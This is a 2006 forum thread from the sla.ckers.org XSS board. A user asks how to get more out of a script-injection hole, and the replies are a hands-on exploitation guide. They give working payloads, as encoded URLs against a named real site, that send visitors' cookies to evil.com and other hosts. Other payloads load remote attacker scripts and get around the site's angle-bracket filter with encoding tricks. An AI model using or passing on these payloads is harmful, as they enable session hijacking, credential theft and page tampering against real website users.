Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
What can you do with these types of XSS holes?
Posted by: Delixe
Date: October 17, 2006 10:41PM

Say you have found an XSS hole that allows you to do alert(), document.location yet you can't explicity put <script> tags within the URL. What other actions can you do? I feel limited in this XSS hole to only those things.

For example:
var s=alert('hello');

that's in the URL and it executes the alert but what else can you do?



Edited 1 time(s). Last edit at 10/17/2006 10:41PM by Delixe.

Options: ReplyQuote
Re: What can you do with these types of XSS holes?
Posted by: maluc
Date: October 18, 2006 02:39AM

Using this example to demonstrate: http://www.skem9.com/search.php?wh=Layouts&keywords=';alert('XSS');a=' which was disclosed by unsticky on the So It Begins thread: http://sla.ckers.org/forum/read.php?3,44,1758#msg-1758 . It uses the injection
';alert('XSS');a=' .. as simplified as an injection gets, so a guud example link

They're already in a <script> tag so an attackers first option is to put the entire payload (malicious script the steals cookies, performs CSRF, spoofs/defaces a page, sniffs a login form, what have you) in the URL. easiest example:
';document.write('Got your cookies.<img src="http://evil.com/cookiestealer.php?'+document.cookie+'">');a='
They'll have to encode the +'s to %2B first though: http://www.skem9.com/search.php?wh=Layouts&keywords=';document.write('Got%20your%20cookies.%3Cimg%20src=%22http://evil.com/cookiestealer.php?'%2Bdocument.cookie%2b'%22%3E');a='a

Assuming they didn't want to overwrite the page:
';i=new Image();i.src='http://mrsunshine/cookiestealer.php?'+document.cookie;a='
(they don't actually have to include document.body.appendChild(i), because it sends the GET request as soon as the .src is set.)

Encode the + and test it: http://www.skem9.com/search.php?wh=Layouts&keywords=';i=new%20Image();i.src='http://evil.com/cookiestealer.php?'%2Bdocument.cookie;a='a If you want to verify it yourself and don't have a webserver, try WhiteAcid's http://ccl.whiteacid.org/ logger

Now that's all fine and dandy.. but say we wanted to do some complicated CSRFing which'll require a lot of script. If you're expecting sumone to click this link (or just for the sake of manageability and updating), you obviously can't have a mile long URL. So how about a way to include a remote script:
';i=document.createElement('script');i.src='http://ha.ckers.org/s.js';document.body.appendChild(i);a='
(this time around, appendChild is required..)


Test it: http://www.skem9.com/search.php?wh=Layouts&keywords=';i=document.createElement('script');i.src='http://ha.ckers.org/s.js';document.body.appendChild(i);a='a

With a remote script you can add all the code you want, and with a reasonably short enough URL. There are even shorter ways to implement this however, such as with:
';document.body.innerHTML+='<script src=http://ha.ckers.org/s.js>';a='

Encode + and Test it: http://www.skem9.com/search.php?wh=Layouts&keywords=';document.body.innerHTML%2B='%3Cscript%20src=http://ha.ckers.org/s.js%3E';a='a .. uh oh. nothing happened. this is because skem9.com filters < and > to &lt; and &gt;. So it's not useable like this without a String.fromCharCode(60) or unescape('%253C')

There's alot of ways to sex a midget - i'm partial to reverse cowgirl - but creatElement('script') is good too. Ultimately which one you choose depends on whether or not it requires them to click a link to it, what filter the page employs, and personal preference. But these should get you started.

-maluc

Options: ReplyQuote
Re: What can you do with these types of XSS holes?
Posted by: rsnake
Date: October 18, 2006 10:41AM

Don't forget you can encode open and close angle brackets in JavaScript like so:

document.write("\u003Cscript src=http://ha.ckers.org/xss.js\u003E\u003C/script\u003E");

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: What can you do with these types of XSS holes?
Posted by: maluc
Date: October 18, 2006 07:50PM

oh, i didn't know javascript would unencode those.. nifty. So yes, try that rather than unescape() or String.fromCharCode() if they're necessary.

-maluc

Options: ReplyQuote
Re: What can you do with these types of XSS holes?
Posted by: rsnake
Date: October 19, 2006 11:05AM

I think any would work... where my method falls down is if they don't allow slashes and quotes... so each have their time and place.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote


Sorry, only registered users may post in this forum.